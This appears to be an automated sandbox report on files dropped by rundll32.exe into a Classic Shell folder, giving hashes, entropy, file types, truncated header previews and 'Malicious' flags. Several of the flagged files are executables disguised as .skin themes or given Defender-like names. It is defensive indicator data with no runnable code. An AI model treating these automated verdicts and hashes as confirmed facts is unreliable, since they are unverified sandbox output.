                                        SHA1:A80105BAD9E68EFFC17702C0029568F632F003FC
                                        SHA-256:992D573A7012C6777D127ED3DC1A5A5343DEE5E30EC7BBC3518ADAF3F28733A8
                                        SHA-512:AA25791215E419F11858984063A5ED75C1BB3E2A7136CC045E4D88E204687BB16342F954AA411B0F6DDA28550A851DF0E62FC79F574926F5BD237CBAD5EF0CC9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......................................................................@..........................................................................................................................................................rsrc...............................@..@................................................................(...8.......P...............................................................................(.......@.......X.......p...............................................................................................................0.......................H.......................X.......................h.......................x...................................................................................................................................................

                                        C:\Program Files\Classic Shell\Skins\ClassicIE_64.exe

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):403816
                                        Entropy (8bit):6.1451106536127735
                                        Encrypted:false
                                        SSDEEP:6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
                                        MD5:FBAA9986931D1ADEDA07A6EF8F04AB6D
                                        SHA1:5FB959351940EB94EEF9D8E21D95436B77FEB9A2
                                        SHA-256:3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
                                        SHA-512:A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.u.3..,3..,3..,'..-1..,V..-2..,V..-2..,'..-9..,'..-!..,:.,!..,'..-...,V..-&..,3..,...,'..-]..,'..,2..,'..-2..,Rich3..,........................PE..L.....,......................L.......H............@..........................@.......Q........... ..............................|....0..................h/......,F.....T...........................H...........................`....................text............................... ..`.data....).......$..................@....idata... ......."..................@..@.didat..(.... ......................@....rsrc........0......................@..@.reloc..,F.......H..................@..B................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\Skins\EppManifest.dll

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):165208
                                        Entropy (8bit):7.110142692986595
                                        Encrypted:false
                                        SSDEEP:3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
                                        MD5:EBEA28C15DD26C1D0C1944215F0AAE8B
                                        SHA1:98375B311B8D56DA260961217073B30D1AEFE089
                                        SHA-256:E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
                                        SHA-512:05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d......W.........." .........P...............................................`............`.......................................................... ...<...........`..X%..............T............................................................................rdata..............................@..@.rsrc....<... ...@... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\Skins\Full Glass.skin

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):363520
                                        Entropy (8bit):6.133549908634759
                                        Encrypted:false
                                        SSDEEP:6144:U0AjlUbLwmHNdPEmf7FYbvESQWwYhli61KYCDbg:U0KlUAANdrDFYY/rDbg
                                        MD5:355ADAA13F7CEF714BFA1143678BADA1
                                        SHA1:64EE68DAE2709C1F4860343006EDF7949FA684EB
                                        SHA-256:0015E2E375366BCA981DC6CA6902AAA38C3C8B3F3E5DF9929489A0411C98487E
                                        SHA-512:3E601F0685BE2216AC5874A727C6E72995A2E0E782E6D877E801F6ADCE3360B7BD80F5860091A42ECFDF1AA326CE2560798D308ADCF77B9B56DD40A75F7F12C4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.................................................................d....@..........................................................................................................................................................rsrc...............................@..@....................................................................8.......P...............0.......H.......................`.......................x....................................................... .......8.......P.......h...............................................................(.......................@.......X.......p.......................................................................................................................................................................................(...................

                                        C:\Program Files\Classic Shell\Skins\Metallic.skin7

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):325632
                                        Entropy (8bit):5.238943133649953
                                        Encrypted:false
                                        SSDEEP:1536:RlsvoBtj+J/OM9SFrKZEWD3uGMvl6TFMoRgN6piWhl7KUsRoQNbYeF70LN/zMzVq:bsv0UJGMIFgD4vlW7G0i6PmcEcogvv79
                                        MD5:3DB77823E2314F47BB700A5D467051F1
                                        SHA1:4F4456B0A119290E71E4C4D672DD0D6D2C283EDF
                                        SHA-256:CC75E8DE18B7D2039C412EE66A066C7A6990BA8856E5F13855A513B87140DA5D
                                        SHA-512:4A80D0A61E04DC053AF1AA16527EC9D604C79911B9A55438C3CDA18FB96546EA1C1EA785DB2DF32CC30AD2F6058095ECCA03F987D606D75918E3282144681A1D
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......................................................................@.............................................X............................................................................................................rsrc...X...........................@..@....................................................................@.......h...............h...................................3.......4.......5...................................................0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................................................0.......................H.......................`...

                                        C:\Program Files\Classic Shell\Skins\Metro.skin

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):89088
                                        Entropy (8bit):4.487460802182499
                                        Encrypted:false
                                        SSDEEP:768:dRG/dn1Yn15+Poix3QMZ2B6mc5sHv42dN0nKsDEDQdmP90nL:/G/dn1Yn15+Px3Wvv7dgKwd9nL
                                        MD5:A517C1D3B1C4FE97FDE5AAA5C0283DA6
                                        SHA1:5AB7C793A760E20BDC05F1E4B4763D64C3C186B3
                                        SHA-256:621576A6BD884368B6163CB57FFE52DDF526FC8EBD7B9614A18E1271A11F15C7
                                        SHA-512:8511E420071F6DB8A8D23F845B4D3232F5480B4ABBEC0C334057995681AAA4FE794D1325C1E72BAF9CBEC0DCFCF84F9A38C65CA29C87EE009D6A3649D2E61263
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........Z...............................................p......3.....@.............................................@X...........................................................................................................rsrc...@X.......Z..................@..@....................................................................8.......P...............0.......H.......................`.......................x....................................................... .......8.......P.......h...............................................................(.......................@.......X.......p.......................................................................................................................................................................................(...................

                                        C:\Program Files\Classic Shell\Skins\Metro.skin7

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):139776
                                        Entropy (8bit):3.616945477969783
                                        Encrypted:false
                                        SSDEEP:768:n3Vn1Yn15+PiyiG3QMZ2B6mc5sHv42dN0nKsDEDQdmP90nh:nln1Yn15+PoG3Wvv7dgKwd9nh
                                        MD5:90C1723A39744441D3031AE75CCB066B
                                        SHA1:2BB2282126A35613BE03C0568870D59CE8ADE20A
                                        SHA-256:D7294F246A893A3B762FBF81F0727282A40F34FBD71F29D7497B41F2C347D3E0
                                        SHA-512:ECF6546C017234B95E5027552CE1EED692DCFC489EFB1EB9A9BF7F12BC0795B19BE0F48805FA4FFB0D163A8A97D0FB0063DD726C062FEFE0EB183CD3219BAF83
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......... ...............................................0.......t....@..........................................................................................................................................................rsrc............ ..................@..@................................................................8...8.......P.......h.........................................................!.............................0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......@.......X.......p........................... .......!...........................................0.......H.......`.......................x...................................................

                                        C:\Program Files\Classic Shell\Skins\Midnight.skin7

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):183296
                                        Entropy (8bit):4.553993353339901
                                        Encrypted:false
                                        SSDEEP:1536:AfARo95Y8pvln1Yn15+PEnnnnnnng3Wvv7dgKwd9nB:aJdn1Yn15+PEnnnnnnntvv72
                                        MD5:5BF1B2188DDA108D4FA8BA7CC77C6453
                                        SHA1:93BB367394AF47BC61BE0611BAEB5B139E037900
                                        SHA-256:83611F33C8504D20221A33206D2B18B4F9B9FF0832086466DFB331852893A4E8
                                        SHA-512:6259FBB35363D2794403FAC5189DF1F31C379CEFE347B8DC635FC15E09F8FA7DC94EBCE370779161F9D77E5AA93A40AC3F908B496686EFD2090E577D9FDD1979
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!................................................................G.....@..........................................................................................................................................................rsrc...............................@..@....................................................................8.......P............................................... .................+.....8.......P.......h...............................................................(.......@.......X.......p...............................................................0.......H.......`.......x................................................... ... ...!...8..."...P...#...h...$.......%.......&.......'.......(.......).......*.......+...(.......................@.......X.......p...........

                                        C:\Program Files\Classic Shell\Skins\MsMpLics.dll

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):25936
                                        Entropy (8bit):4.328275985676387
                                        Encrypted:false
                                        SSDEEP:192:9+DWgAHWglQBEKLO0cCroDBQABJFI6eYIN5vCX01k9z3AzfSXDlG6P:cWgAHWtBEJlDBRJeWUJCR9zUwDM6P
                                        MD5:4A8B58C88DF1C607A9DF21EE390CA8F8
                                        SHA1:18B995CA90D74D34975F9DF8E8611F35E7B94E9D
                                        SHA-256:1A90C01C3FD40E5CEE77F626BF9883B5D276132252E28EE4B6C2C02D9CD30E4C
                                        SHA-512:1ECCD6FB016C7E43FBE63120A2A43135B17453AF428658E11EFD69F753FEE5A5F227202144CE85840388E138D392F0A528450B37DE23EFE902CC467A5CD4F1DA
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d....f............" .........0...............................................@............`.......................................................... ..0............@..P%..............T............................................................................rdata..............................@..@.rsrc...0.... ... ... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exe

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):587096
                                        Entropy (8bit):5.955146470563534
                                        Encrypted:false
                                        SSDEEP:6144:UoSVOVSccnel+Z/smH98qn3xVPNCqdeAB5l6Hv7YPdr5/NJSFiimiTVVmVVV8VVp:ULOVSpu+Viq3xnJdtn6jUFYNN
                                        MD5:2776A2B1C9D82F3FEBAA8CA1F5544992
                                        SHA1:28620B6498EEFA4E411686FEAC1C0E03D66B661D
                                        SHA-256:D1F81D7C43B522E39F0FD14E1C25F97E7894CEBBE1F43320CBB66BE1528A7A72
                                        SHA-512:2FBCA83415F5E927B38DBF7064CAAE1CD67EC2ACBA6C00AEB3520F9C8BC3B9DE46329CB57B2D1D9DC7CB33BD89766E6C8C3DC3C1FC6B3DAA885CB50FE64C5E2B
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...................................................................................Rich............................PE..d...+WSF.........."..........P.................@..................................................... ...........................................................6......X%......x...TY..T......................(.......@...............`............................text...L}.......................... ..`.rdata..............................@..@.data...`Q...0...P...0..............@....pdata...6.......@..................@..@.rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................

                                        C:\Program Files\Classic Shell\Skins\Smoked Glass.skin

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):213504
                                        Entropy (8bit):6.406320997067057
                                        Encrypted:false
                                        SSDEEP:1536:WTh4R2u44444GltPGGGGdM414Q44444IRt/dGGGGdGk6CMrvn1Yn15+PsI+3MRK1:2hTPBn1Yn15+P6Vjbvv7x
                                        MD5:47590B1DEC24EBEEA01F804BFADAC213
                                        SHA1:4A16D390E05C39DE137392CBA17A51C164FE971F
                                        SHA-256:D8798D2631DA3F1EC6979D432717B6A281B781213AAA846488568FCE89D850B2
                                        SHA-512:FDDF1215A77AA8D0DD92952640CBA31D9C719EA6821039734B24A76855AD6948AEA4D5607E308088EF3F8F211A78582A7DE93CFC34C2F6A93BBD252CD27A74B5
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........@...............................................P.......n....@..............................................>...........................................................................................................rsrc....>.......@..................@..@................................................................x...8.......P...............................................0.......................H.......`.......x....................................................... .......8.......P.......h...............................................................................................................................(.......................8.......................H.......................X.......................h.......................x...........................................

                                        C:\Program Files\Classic Shell\Skins\Windows 8.skin

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):131584
                                        Entropy (8bit):4.379206172945769
                                        Encrypted:false
                                        SSDEEP:1536:ChysRoK62fennnnnnndHHHHHHH13Wvv7dgKwd9nD:XFnnnnnnndHHHHHHH0vv70
                                        MD5:03DFAFC8BCA897EA07443FF3ECC48F51
                                        SHA1:86457F8721AED8209DF2FAC5C429F3F329130398
                                        SHA-256:C08D05FED558D13517A94F2FEC45322242F7EA384FB5E0C38CC993622C8D29E2
                                        SHA-512:4E320DDE86A273AEF5B7BC4D33D6A3D854B9435E539256CD3DFD2B7AEC5617D8298CF25BE944114380A81881772C5AE2033351E73BED769C7C4401792AE6F98D
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......................................................................@..........................................................................................................................................................rsrc...............................@..@....................................................................8.......P.......P...............................................................................................0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................................................................0.......................H.......................X...

                                        C:\Program Files\Classic Shell\Skins\Windows 8.skin7

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):167936
                                        Entropy (8bit):4.00857501777639
                                        Encrypted:false
                                        SSDEEP:3072:ZqnnnnnnncJpJpJpJpJpJpJpJSWRWRWRWRWRWRWRW8HHHHHHHiFJFJFJFJFJFJFW:ZObS
                                        MD5:D718812B48FCE7A18952B790544E0269
                                        SHA1:9EA842565759FE856A305C52E1413E56AAF62240
                                        SHA-256:0683ABA24E262C76FE4ED77729CE10B1CCDF29954314D43F23DF5AFC8E5F0AFE
                                        SHA-512:D36B7009401B0422B5843D1594D5B97BEBFAF7F5518D63A1405B3979DDA4D89179743343B73A0BFDB6F94434EE295F307FCBCF992ADC1E5FCFB700A7EC9AF1C5
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!......................................................................@.............................................t............................................................................................................rsrc...t...........................@..@................................................................X...8.......P.................................................................'.............0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......@.......X.......p........................................... .......!......."...0...#...H...$...`...%...x...&.......'........................................................... .......................8...

                                        C:\Program Files\Classic Shell\Skins\Windows Aero.skin

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):343552
                                        Entropy (8bit):5.423534189315234
                                        Encrypted:false
                                        SSDEEP:6144:iJFB4IMpxItYSGoxtGrV4Q8owgOgJWZxd4p59+aalbt:iJFAZkbt
                                        MD5:45EFC625726643DC7F8BF04257898A49
                                        SHA1:A7DF0F5795D70C7449D50280E107C2EC21761396
                                        SHA-256:304F3B6255F21CD6835D5189D3F8520A5BC041ECD3963FCEBF19922C2423E9D7
                                        SHA-512:5C44CF99CA98A1F738F248E8D6E492A13F170CFFE6367D57CAC47F57CB73175961278E10A191197F8E337E23C698AD0701B524AC69E0C2D2E8310232FDE6F944
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........<...............................................P......nK....@.............................................<:...........................................................................................................rsrc...<:.......<..................@..@................................................................(...8.......P...............H.......`.......................x....................................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................................................................0.......................H.......................X.......................h.......................x...................

                                        C:\Program Files\Classic Shell\Skins\Windows Aero.skin7

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):409088
                                        Entropy (8bit):5.242850309968895
                                        Encrypted:false
                                        SSDEEP:6144:NSUV4Q8owgOgJWZxd4FaaXCAftbAQ5OxlBQGPdmC6TP5UQTy/Jd+mBp4pEAbx:NSUDlJbx
                                        MD5:56DE14A10B76371536260ABC3344B67D
                                        SHA1:4D898C41FA9FC62B5F9637986C5519A10931D34C
                                        SHA-256:394411D1759BA920FB2F77156760BB9BEE6E58A36505BF846AE8E687AB1F54E4
                                        SHA-512:AC586789C5D9F9365E28BC0202E11E1BDE535AEBA1C8F41DA12B69EB054BB793B6DFD52971B52CBC4890D0A2A92527501681667EDE920DF91315F2E2A49D0463
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........<...............................................P.......O....@..............................................:...........................................................................................................rsrc....:.......<..................@..@....................................................................8.......P.......X....................................................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................0.......H.......`.......x....................................................................... .......................8.......................P.......................h...................

                                        C:\Program Files\Classic Shell\Skins\Windows Basic.skin

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):343040
                                        Entropy (8bit):5.008474119305636
                                        Encrypted:false
                                        SSDEEP:1536:5qsRokHNKsKL11GGGNeeee9Edhyeemmm9OOOOca3l68+GGGGNeeee93e+ch0RfaV:wSKZhD6iOaalvv72
                                        MD5:F80DE60302E457C663786BC4487ADAE2
                                        SHA1:06A7162C9960D0032C83175E9112F652187E8114
                                        SHA-256:EA3FF26E86C8FCBE56106978E636251CE7CE06598E86A49817823AB5FFD9BE72
                                        SHA-512:3446374B6682E1FA09BDEC8CC58AADDEC1D87F648F0C6E64B196857C4D3901EEDC0B7FE2506C9D05C7A9F22117B9DDACDD230D435BF7A6A68ADBAC694E61C858
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........:...............................................P.......Q....@..............................................8...........................................................................................................rsrc....8.......:..................@..@................................................................(...8.......P...............H.......`.......................x....................................................................... .......8.......P.......h...............................................................(.......@.......X.......p...............................................................................................................0.......................H.......................X.......................h.......................x...................

                                        C:\Program Files\Classic Shell\Skins\Windows XP Luna.skin

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):933888
                                        Entropy (8bit):6.081569368613605
                                        Encrypted:false
                                        SSDEEP:6144:C0dddV9NppppUm/39h0dddVVNppppUm/37bk:CGabk
                                        MD5:ECC3682AC642D4B32E8DACE2D27EDD79
                                        SHA1:2C6209E8705BD1A219B5C535529F658121EA7AF0
                                        SHA-256:0D6AFAEEC9E85E425397BBFC35E310C31F1BCE66601063CA023F145A1E2E966F
                                        SHA-512:99F42B5E85F35846A7FB3C588A1984E100E35107B3541E056AB9BF836BE96B6E80D83054C03C04B256C2BB1C6E2C875523AFF194EDF9DB276558A76A8B8361E3
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..o..o..q...n..f...n..Richo..........PE..L...M.K[...........!.........>...............................................P............@..............................................=...........................................................................................................rsrc....=.......>..................@..@....................................................................8.......`.......8.......p...............................................................................................0.......H.......`.......x....................................................... .......8.......P.......h...............................................................(.......................@.......X.......p...........................................................................................................................................

                                        C:\Program Files\Classic Shell\Start Menu Settings.lnk

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sun Jul 15 15:15:34 2018, mtime=Tue Feb 7 18:51:36 2023, atime=Sun Jul 15 15:15:34 2018, length=163640, window=hide
                                        Category:dropped
                                        Size (bytes):1278
                                        Entropy (8bit):4.460613672256436
                                        Encrypted:false
                                        SSDEEP:24:8fgIiRud/RoEQGmA0aM6AYJ/pbVp9A0aM/qdKPwJaZ8mabEy+ATA0aM:8RiRud/z7xMpY7bCxM/qdqubG5xM
                                        MD5:7B6FF5EF00DFF6D36DB7832BCE15BE5A
                                        SHA1:911C2AF6C77EF465F6704144A34666FB5EC44E20
                                        SHA-256:5E2745F62D02097C45393316B0C363C3C5AEF454F53FCA322EE84FB64E34627F
                                        SHA-512:FE58D4E586B479A95D997E20F1ACC0088A7F6F1C0F562B4A1EC59F97DEAF82C4259E5C16A8567873FCC136E9ACEE20C7BF50775B9BC38189DF37EB41203E0310
                                        Malicious:false
                                        Preview:L..................F.... ....W..W.......-;...W..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs.............................|.C.l.a.s.s.i.c. .S.h.e.l.l.....v.2.8....L. .CL4DF7~1.EXE..Z.......L.GVs......p........................C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e.......b...............-.......a....................C:\Program Files\Classic Shell\ClassicStartMenu.exe..+.E.d.i.t. .t.h.e. .s.e.t.t.i.n.g.s. .o.f. .t.h.e. .c.l.a.s.s.i.c. .s.t.a.r.t. .m.e.n.u.....\.C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\...-.s.e.t.t.i.n.g.s.........&................c^...NI..e.2.......`.......X.......developer.........;.3L..,.{b..D...&...S..2.jA..;.3L..,.{b..D...&...S..2.jAO...........1SPS.....Oh.....+'..i............,...E.d.i.t. .t.

                                        C:\Program Files\Classic Shell\Start Screen.lnk

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Sun Jul 15 15:15:34 2018, mtime=Tue Feb 7 18:51:36 2023, atime=Sun Jul 15 15:15:34 2018, length=163640, window=hide
                                        Category:dropped
                                        Size (bytes):2170
                                        Entropy (8bit):3.6314833200420304
                                        Encrypted:false
                                        SSDEEP:48:8RiRud/P67xMpYuyUxM/qdk3H5XdtleMS+kWXdtle6by7fxMfe:8Ri/76yuyU6/535Xdtle7WXdtle6byrV
                                        MD5:D69C9EBBCD7BAFC825E102C152CACECA
                                        SHA1:343E647AD0464050384EB4243F08C0352B199B7C
                                        SHA-256:F9F870340594D16E15E8E861E3C9D9277737014BB9B66B17BEA76EF722150612
                                        SHA-512:198DA4A6C8FD70739B58D6E028391EA9B0A43DAB0488E12AB72C825175634F49E8DA07C6112FD084A52187AA405C16D6BCDFA340F08D3F16825FF700198F16B8
                                        Malicious:false
                                        Preview:L..................F.@.. ....W..W.......-;...W..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs............................py.C.l.a.s.s.i.c. .S.h.e.l.l.....v.2.8....L. .CL4DF7~1.EXE..Z.......L.GVs......p........................C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e.......b...............-.......a....................C:\Program Files\Classic Shell\ClassicStartMenu.exe....O.p.e.n. .t.h.e. .S.t.a.r.t. .s.c.r.e.e.n.....\.C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\...-.t.o.g.g.l.e.n.e.w.K.C.:.\.W.i.n.d.o.w.s.\.I.n.s.t.a.l.l.e.r.\.{.C.A.B.C.E.5.7.3.-.0.A.8.6.-.4.2.F.A.-.A.5.2.A.-.C.7.E.A.6.1.D.5.B.E.0.8.}.\.S.t.a.r.t.S.c.r.e.e.n...e.x.e.........%SystemRoot%\Installer\{CABCE573-0A86-42FA-A52A-C7EA61D5BE08}\StartScreen.exe......

                                        C:\Program Files\Classic Shell\StartMenuHelperL10N.ini

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12504
                                        Entropy (8bit):3.9901492106201517
                                        Encrypted:false
                                        SSDEEP:96:rWmJbnrYb2RmqnrOmx42nrsWmq+nrmGhmPk+nr/Ymt/nrUYmQmnrBBmkdnrw1Jms:LAb2hgdKV0RSTx2yY3cQgYdlQzvDp
                                        MD5:8F13BF2F1F487B6B4B1580322C95B1E9
                                        SHA1:7ACF79E62409413F83EA6A86B8672CDA9A92F81D
                                        SHA-256:E082504EB91D7E5ED60F5A6B7866C77349C566D7185F167D24AD022E02E83C2C
                                        SHA-512:49BD5E70912CA70326460B6223A4257E5658A445135E446B49616F903CFB685086BCD606B16A4F17D18849F91D1726FC904237E6663AACF55EA47530347E0BAC
                                        Malicious:false
                                        Preview:..[.a.r.-.S.A.]. .-. .A.r.a.b.i.c. .(.S.a.u.d.i. .A.r.a.b.i.a.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. .*.+.(.J.*. .(.'.D.B.'.&.E.). .".'.(./.#."... .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. .%.2.'.D.). .'.D.*.+.(.J.*. .E.F. .'.D.B.'.&.E.). .".'.(./.#.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.b.g.-.B.G.]. .-. .B.u.l.g.a.r.i.a.n. .(.B.u.l.g.a.r.i.a.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. ...0.:.0.G.8. .:.J.<. .<.5.=.N.B.>. .".!.B.0.@.B.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. ...B.:.0.G.8. .>.B. .<.5.=.N.B.>. .".!.B.0.@.B.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.c.a.-.E.S.]. .-. .C.a.t.a.l.a.n. .(.C.a.t.a.l.a.n.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. .A.n.c.o.r.a.r. .a.l. .M.e.n... .I.n.i.c.i.a. .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. .D.e.s.a.n.c.o.r.a.r. .d.e.l. .M.e.n... .I.n.i.c.i.a. .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.c.s.-.C.Z.]. .-. .C.z.e.c.h. .(.C.z.e.c.h. .R.e.p.u.

                                        C:\Program Files\Classic Shell\StartMenuL10N.ini

                                        Download File
                                        Process:C:\Windows\System32\rundll32.exe
